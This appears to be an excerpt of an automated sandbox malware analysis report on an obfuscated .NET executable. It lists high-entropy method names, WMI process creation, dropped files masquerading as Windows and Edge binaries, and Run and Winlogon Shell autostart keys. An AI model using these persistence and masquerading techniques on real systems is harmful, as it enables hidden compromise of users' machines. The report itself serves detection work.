                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, dbPnUjcZHLPsquDvRga.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'Uvk4RmJw3Ta', 'SZ74RvcsxYG', 'chuvrR4wpabnoM8L1Pbo', 'EeWBRu4wCc6jYC1ixsQy', 'jLRTXv4wH4yu5BPbihHp', 'sRZqLk4wfQEF66hnOGxd', 'DnpUk24wL7A2Tf6HcwH3', 'JKfPg24wOf4dnOMOB5q4'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, YtD94Vzpt1VlhJ0NWF.csHigh entropy of concatenated method names: 'PE144cEKU8', 'MaS4UoXdZT', 'hkn4ymiT2W', 'IGV4MrJ8oV', 'g41407xDoV', 'dbH4aeOjjI', 'llU4XTiTbS', 'R6WIvo4EyFEkE5SV0ss3', 'OAPf4y4EMxVQnpuPQMmN', 'SqKm8g4E0mywSUwb6s4b'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, wpH16jEUXH1BT5jsrLJ.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'eagEMh3hY3', 'Write', 'nVZE0QiuoR', 'WxSEaMSbcQ', 'Flush', 'vl7'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, P61AaLWK3hElMl6x9fl.csHigh entropy of concatenated method names: 'ziGWtp05eF', 'TIGWuFYjcb', 'rDSW2TrdYG', 'PpYWJ41Th7', 'tKeWkqo9Zp', 'DiKQXK4CB4fahvj798Bl', 'tmCCKL4CGkORkpWwUvCA', 'JtkhuI4C5FSqkLbwdHdp', 'fCaZCi4Cwg4w53F35hAo', 'tKWcCW4CpqqdBRtxGaqk'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, UFdjLwtrHEW4mNGqbb5.csHigh entropy of concatenated method names: 'NfR4RA8TQBm', 'Pk0409xCXPI', 'raii5v4JoPIcxlkqpaEX', 'WXfbTv4JbFtejHoMTodS', 'GkaqIM4J4hWXMrKe0q11', 'w4dwHO4JUjYPyUk4fL5r', 'tKoKvf4Ja4lFCfTAUmOr', 'FIsy3L4JMHnytVEyh3II', 'PSI8l04J08oaCEfYdBSk', 'JIOtYw4JRA72XmktDUrb'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Y9HuZGMCVvJKoVekNlu.csHigh entropy of concatenated method names: 'GcLMq6S3cu', 'mgbcSf4VzvMOwLw6qE70', 'MsoDZA4V7p2N4PWTJOgQ', 'xAtjMH4VSU5GhdtinDeR', 'MDkHXM43bHrZi3ExR7Mu', 'MwqmQe434hC35vFpGSgR', 'U1J', 'P9X', 'yEl4yI71Z8e', 'YBQ4ysEJgqS'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, cnCX4hPVFeA2vHp4QfZ.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, dvJa7r3cctN5qPfM5BG.csHigh entropy of concatenated method names: 'NpdgeFexwe', 'EWRCVi4FpiXRO7EOpYTm', 'l5J2Of4F5tRnUonUTdjV', 'CWB8Z74FwkYfLgn7rUxL', 'ODA7tx4FCcwyHYmitBM5', 'kt5', 'vfH3v7fHoo', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, H3JNOiJbdgZE5oy0eoW.csHigh entropy of concatenated method names: 'Lc0Jy9SaZY', 'EXXJMtcYTx', 'uFsi7s4kNaOxCR5HhMs3', 'VeU6GL4krTQdOK2PknVL', 'WuiuDx4k1AOJhQ956KTx', 'ToS7Hk4kT7BoBHBUxfYQ', 'C5pFqX4kBZdq077VcQyb', 'wiLfp04kGwmuX6X1quHA', 'dgIJolKBu0', 'JYxmwZ4k35nJjebygM0E'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, HMHoigNJgtJHL9PK0N4.csHigh entropy of concatenated method names: 'b76', 'method_0', 'q7Q', 'K41', 'vEh', 'pu6', 'Xk4', 'K81', 'YV4', 'method_1'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, o8BhObPR6XETyImrIcA.csHigh entropy of concatenated method names: 'WrWPYUV5E3', 'iY8PZJ3H6s', 'LpdPjObg2n', 'goSajw4LJLORex7V7yqk', 'hEyvJO4LukB5PUihAvI2', 'TXfvhW4L2UKjqsfNy2lb', 'tc3AZD4LkUfsl6Ue6dEj', 'd4uHWi4L7e0axteRgMcT', 'FPQhEB4LSL7cT2NMG3rC'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ql9tVhoV7BPF4tmQ4tI.csHigh entropy of concatenated method names: 'hnHowsHek5', 'gM1opwKeLn', 'kfgqBD4x81fATEpp4Ukb', 'gYcmUl4xxgiaR5h0d2OJ', 'oNpBhB4xPL38O0DQCprf', 'dJwnL14xVQL4dV0rFiFN', 'qVFoLu8DER', 'Rm0sMk4xTQlD3LrnQT44', 'ild3cg4xNKkU5KZ71mhx', 'jW3kqc4xgpmfZdGFDW2b'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, WvLov4iBrxJryiX4WTe.csHigh entropy of concatenated method names: 'MI0ifqR3Y1', 'R8PiLJMuVr', 'k1DiOT7vTY', 'vcJG4e45UqAYIfrJWAty', 'oB4quv45yMpFwRqGUGvX', 'L1L2dd454xBbay6q829s', 'uUUPhm45otV7drhTNS5g', 'pn4i5PnyGu', 'F0giwYwgya', 'Qx7ipTGU6x'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Y02CwXxSseGNgDAEDqk.csHigh entropy of concatenated method names: 'jDhPbnMdxU', 't1VP4vDsrO', 'GpWPoRk726', 'dCwPUMnoLY', 'a26PyhgwNl', 'U1mPM5LH7U', 'mj7ITY4LLEIHjyr08qNc', 'euALSP4LHEgFCQewjf8X', 'erl5hc4LfPuIrhT8foCu', 'QDo0Q84LO0y6cMyrJ9dF'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, vdt507l94vMmVcT2u3.csHigh entropy of concatenated method names: 'c9n1WEjMs', 'VUjdNF4APcOb4tV8clVJ', 'F8nIhZ4A815g3LmD8f4T', 'VsNiSBQUF', 'nDYduOyMi', 'enjc52DxL', 'w68mNdVFx', 'apTvvIXfD', 'QWNWquhKV', 'mn46D6Myu'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, JvLKWFxn1AwUlsQB3c8.csHigh entropy of concatenated method names: 'b0DxucjqN7', 'fkpx2wBZEo', 'VjKxJt49yF', 'DH2xkhW92v', 'x2dx7y2EMl', 'yW5keC4LBeR8710yO6cd', 'sNqOKZ4LNdpSO1R3hte9', 'aniUxa4Lrls2jEuDmSDU', 'X20dS84LGeTwoy4E0sU1', 'ieTYVd4L5ZIWnwjmFQ0N'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, GIXXWeUFuQGhavs5PT0.csHigh entropy of concatenated method names: 'kN8yUVd8H1', 'bItyyicSxf', 'aAyyMudmdW', 'CgSv5W4Pzx1WqABhCL4S', 'duMYts48b5DiukbChCBl', 'c9hOtn484RX5p0gh6EEJ', 'BfkyZQKf1A', 'oCWRo348MjbqiLpDTPmP', 'AUsMir48UbHLngkJRv2U', 'vTSmjK48yCngGvIehjWj'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, DKyRIlyGfAqlDrsZ4nQ.csHigh entropy of concatenated method names: 'BqZy7SQWFB', 'VlgLZt4V46FUlIZE6q5T', 'qIZxsx48zI3AO1mw7DIJ', 'EdFGYv4Vb3TPpGm3FZXx', 'mw02L44Vod7CYi8EauJU', 'zrYSMG4VytQjp8KxeE5W', 'FV7TO24VMryfVeyFHa8K', 'R6jvmf4V0bZR4uQIoXCH', 'KlYM0v0yue', 'gFovLR4VYHJBBXSBECJ4'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, nMUNmhRmA7CLNA51YRj.csHigh entropy of concatenated method names: 'PUtRWd5IVZ', 'sQtJOL41gsTmB9uQHdNu', 'HegUGa411EpRhGGLF2cg', 'XYTon741ToBD5Cokb6a3', 'IdJPFr41NiMnaLvwvmep', 'pD9AEG41VwnMbZ2rRudI', 'BGaHnx413dSa8gl6DMI0', 'qJ4mKL41riwGISC5aVQF'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, W3g2avGVc5rO8B8tHXX.csHigh entropy of concatenated method names: 'Jm2GgnnQIa', 'rkuG1CWklC', 'uLVGTkxfYc', 'DAHGNvpFd3', 'qCHGr0DjyN', 'eCmGBTr85t', 'IERGGrn7cp', 'nf6G5PpYLp', 'FiVGwQFBXP', 'NpvGpjE1i8'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, SZeFJ7it6OlvXGYMHfc.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'aBb4RDoS9DH', 'xMh4yfV8kPN', 'qDHscK45eyM3pKAZRgj5', 'zM07tO45hgaioG5WOSDO', 'i5AMFJ45IywxU1XaoGYc', 'S9Yq9q45sO0tbMb10PgX', 'wcZStZ45lVMonmYrqti1'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.csHigh entropy of concatenated method names: 'QJ9HxW4kkAZ83UJyDASW', 'iurcFR4k74VAdxapIulJ', 'Rvvktx8MTS', 'C6IVjw474OSaSLTOqINa', 'uuf1fI47oV8ED5bAaWbP', 'Ymkb3e47UDBsHMQ3OvZk', 'M6mQok47ylWI0L3l7IfC', 'pmnw1i47MSLtO9esL09p', 'rTE3Nl4709FKmoTGdroU', 'N5ZHTL47aJcpJBm8L8Xs'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, MoRx0REwCrWeXvft26u.csHigh entropy of concatenated method names: 'ijiE7r7Kck', 'UvPEzLZCP8', 'dxVECX1uJK', 'jGtEHEJtl7', 'MPKEfb0AGB', 'HI8ELv3a2Z', 'IEhEO2wiqJ', 'RNXEqarJ1r', 'pF4EFn3yaR', 'HEmEKTNyH6'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, IJGh6nxfAg4SQk0kpGq.csHigh entropy of concatenated method names: 'M1UxOaWyJJ', 'ECjxqPHyd3', 'X0sxF0Lbr6', 'l4DsTI4LPBMS3Qm550MY', 'zvrmwr4L8wYswingc2Xe', 'i9O6ef4LVq4Lr4hpip42', 'OclwDp4L3Bt1WYqAuGRB', 'RRk3o34LgkEdSunRXfuH', 'PPwhYX4L15C9AswjNIo5'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, rGjcx6MG7BX7UDSlda8.csHigh entropy of concatenated method names: 'q64', 'P9X', 'hSy4yeNnget', 'vmethod_0', 'M914R0WEOgV', 'imethod_0', 'JqQCjh4VLOiGcOqKylQP', 'pJlUU74VOPUGSui6wogP', 'OB1rXB4Vq65ZnOkbMTsL', 'WdgNFJ4VFN6W8GSZLnC4'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, njOwdSd2K9SjyD52Wmf.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'wBUdkRhUVo', 'HAX4RQFMWZh', 'RhAC1c4w9PwFajtS01Su', 'iW2bDk4wWbmrWdOYlssK', 'drsDsX4w6gyjYZo7045s', 'X1y6lI4wAMEPXenVBhOB', 'wOvLJQ4wEEHrfIyCk0Fq'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, JGATs0REhlQFEGLX1u2.csHigh entropy of concatenated method names: 'CG6RP2fe7G', 'huQR84LUGA', 'IfiRVoSZNj', 'tk3R36wspU', 'IouRgALyPL', 'idZR1mu1Cy', 'yRuERY41HglOYoFuIScf', 'H1cYVk41fbLwuPk7lRiS', 'KEvmPN41LRwgUbwQXNHt', 'pkMvbv41OgJdMeGoTnda'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, qDbss6M1tafVf6wFoyb.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'MXS4yZlm9TM', 'vxnMNO28qE', 'imethod_0', 'Qcl54S4VB0yRhWdExF8U', 'a6KUDo4VGT2WiKlGEuaN', 'IQjyL74V59GUaF2NAURe', 'xbfayV4VwZAyZ4YYfV6i'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Ri3wCCRfkaT15dY2xWG.csHigh entropy of concatenated method names: 'NgIR2RCSIX', 'm4Ugiw4T0Cmpu2erxVWQ', 'KAKj1j4TyhOMSTb2aK91', 'DVaZ7w4TMg6itW8fT2OQ', 'Puu4Kj4TakfLSxZKmoHR', 'b4R7A64TRT5XOxJhvQhD', 'P9X', 'vmethod_0', 'yNW4yEBpo7m', 'imethod_0'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, rgO3XvBXAsyxQIeA4hu.csHigh entropy of concatenated method names: 'k5HB68kBgA', 'Ur1cnx4t06AIcLqNZBEh', 'EqDwUq4taHWrC2FqfIAp', 'fMrqOd4tyrCKi0sFuxs3', 'Hdr5Wb4tMfDCofyZ2dPv', 'dobXK84tRj2ZpmpN8LCJ', 'IPy', 'method_0', 'method_1', 'method_2'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, uooY65gFmre5mX3ZUxv.csHigh entropy of concatenated method names: 'RbLgnUBbjS', 'k6r', 'ueK', 'QH3', 'TxigtDjSdc', 'Flush', 'XLIguyf5js', 'huvg2KmFQ5', 'Write', 'gFVgJoW0bF'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, kLACCO8yTXsPlfqEDbr.csHigh entropy of concatenated method names: 'nXI80s3JKv', 'xce8ahA882', 'up38RFUJM7', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'Ams8XBBo3H'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, N97fqbXoKtEhvohd0ls.csHigh entropy of concatenated method names: 'ChZXyqe7kT', 'suxXMaWN9T', 'hN3X0RdnwV', 'AbkXadEYcg', 'a3bXRdUmRd', 'vjJXXrGYRC', 'hiBXY8IQuZ', 'Q5sXZ5Hxu6', 'uGDXjiUNYn', 'YS4XDwUrFE'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, EWhPj5tVQwL5eKyDfiu.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'mXvtgpqMJe', 'aJ3txj42E8IUR7IMMO3d', 'lhwWfj42xgGr0CEJ5Tvk', 'rpWEPQ42PiLBNRYQCZGv', 'NPDgLB428cKlXJ5rjY6Q', 'M9YlXo42VSZDkIKKmKIP', 'OGxaAX423oLe9qNHpR3h'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, WC2lhc8S7cJvRYRUBOT.csHigh entropy of concatenated method names: 'UnpVbMFs4k', 'OZyV4vlegn', 'Yd7', 'WFJVoVFRlc', 'MheVUY805P', 'IjoVymANAn', 'VGQVMRUcJr', 'FR8kyx4qFqQh9gDm50ms', 'RC5XVu4qOPWvFQ56BnyG', 'eR1cHD4qqUwFwUGuKbX4'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, bQLWk61FTUsNnSNAEv9.csHigh entropy of concatenated method names: 'mrWYTB4KJAYyPNkD7W4Z', 'UyBOr84KuTDUNToABqQS', 'lo31eV4K2JqbraCDTDdA', 'Qqcigp4Kk2MP3myb5CbN', 'ric1nNsD02', 'Mh9', 'method_0', 'pJZ1tfEl2W', 'vyH1ukjtsm', 'hIy12aTx8l'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, BF6Gx98HUHImTRJaW91.csHigh entropy of concatenated method names: 'QOO8Lp7xqb', 'CpP8OVEiCH', 'jqN8qeavho', 'pfh8FAwPIf', 'gV48KMDEZw', 'q0i2La4qNpss7yI7TI7P', 'D4Nl5X4qrfOh94LyRBmY', 'Mhb6QG4q1qJcnFMpOSaH', 'bAGiar4qTBsYHQedM4q8', 'Lne4BA4qBgtPu2jemuHC'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, zTDs9RXWDtQwJonRDT3.csHigh entropy of concatenated method names: 'M3MSNH4r91pe0Etk2Xc7', 'RdUitp4rWIo7w7P5x9S7', 'OCH1HD4r6mU5o7lOXIN3', 'rwj0xL4rA3rmvZGeW5vr', 'lDteSPk2Aw', 'eGBGGK4r8Sy0hdEtkm1T', 'Ks0Li04rxLiZ1a3S78Nb', 'NZ6dT04rPTyjoLRdLkAi', 'u68X0p4rVaVYi1En3MlB', 'nNEH8X4r3QqYvWQUH753'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Y690dnaNKj7VmGqmEMb.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'Q484yWFRAZD', 'U9g4RZ7kg9C', 'imethod_0', 'kafBoo4gtFNWAlAR7orj', 'a2oE9W4gu4iTmellDKJF', 'WB6M9B4gKU2c01mO6oiY', 'xEHj7d4gn4HWQcPvqi2f', 'SQoQvK4g2Jr3aWwHLd1B'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, orHqMF0wMBUA0rkqlRP.csHigh entropy of concatenated method names: 'Nc502YOsBJ', 'bgG0JC2opI', 'GxR0kMLco1', 'KNxUK943zmOu7cTIXJTY', 'tUy9564gbG03ndRkrisX', 'Y0KHQE437pvSopn0YJvW', 'HFLlys43SfkRRYJVL3Nn', 'QsF0CkRJZr', 'djJ0Hi6VI1', 'cBY0fW9PwM'

                          Persistence and Installation Behavior

                          barindex
                          Creates processes via WMI
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Program Files (x86)\Windows Media Player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\HnmxfGsC.logJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\ynMPgItS.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\yEThvdnU.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\fsrbbHSF.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\WJYLrfNX.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\oWARLBim.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\MaEvHCHq.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\ynMPgItS.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\HnmxfGsC.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\yEThvdnU.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\oWARLBim.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\fsrbbHSF.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\WJYLrfNX.logJump to dropped file
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\MaEvHCHq.logJump to dropped file

                          Boot Survival

                          barindex
                          Creates an autostart registry key pointing to binary in C:\Windows
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Creates an undocumented autostart registry key
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Creates autostart registry keys with suspicious names
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6caJump to behavior
                          Creates multiple autostart registry keys
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6caJump to behavior
